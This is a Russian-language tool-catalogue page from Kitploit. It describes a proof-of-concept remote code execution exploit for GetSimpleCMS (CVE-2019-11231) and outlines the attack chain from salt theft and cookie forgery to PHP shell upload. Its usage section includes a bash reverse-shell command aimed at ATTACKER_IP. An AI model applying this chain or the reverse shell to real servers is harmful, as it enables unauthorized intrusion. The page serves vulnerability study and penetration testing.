Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2019-11231-PoC — CVE-2019-11231 PoC | Kitploit
Инструменты/GitHubGitHub/akincibor/cve-2019-11231-poc
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubakincibor/cve-2019-11231-poc

CVE-2019-11231-PoC

CVE-2019-11231 PoC

Репозиторий
18 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

GetSimpleCMS CVE-2019-11231 RCE эксплойт

Python CVE

Эксплойт удалённого выполнения кода без аутентификации для GetSimpleCMS ≤ 3.3.15

Уязвимость

GetSimpleCMS публично раскрывает конфиденциальные файлы (/data/other/authorization.xml, /data/users/), что позволяет злоумышленникам:

  1. Получать API-ключи и имена пользователей
  2. Подделывать cookie аутентификации
  3. Получать CSRF-токены
  4. Загружать и выполнять произвольный PHP-код

Оценка CVSS: 9.8 (Критический)

Использование

root@kitploit:~
pip install -r requirements.txt
python3 exploit.py http://target.com "id"
python3 exploit.py gettingstarted.htb "whoami"
python3 /tmp/test.py gettingstarted.htb "/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'"

Как это работает

  1. Определить версию → GET /admin/
  2. Получить salt → GET /data/other/authorization.xml
  3. Получить имя пользователя → GET /data/users/
  4. Подделать cookie → SHA1(username + salt)
  5. Получить nonce → GET /admin/theme-edit.php
  6. Загрузить shell → POST /admin/theme-edit.php
  7. Выполнить команды → GET /theme/shell.php?cmd=...

Файлы

  • exploit.py - Основной скрипт эксплойта
  • requirements.txt - Зависимости (requests, beautifulsoup4)

Отказ от ответственности

⚠️ Только в образовательных целях. Тестируйте только системы, которыми вы владеете, или системы, на тестирование которых у вас есть разрешение.

Ссылки

  • https://ssd-disclosure.com/archives/3899/ssd-advisory-getcms-unauthenticated-remote-code-execution
  • https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11231
Скачать инструмент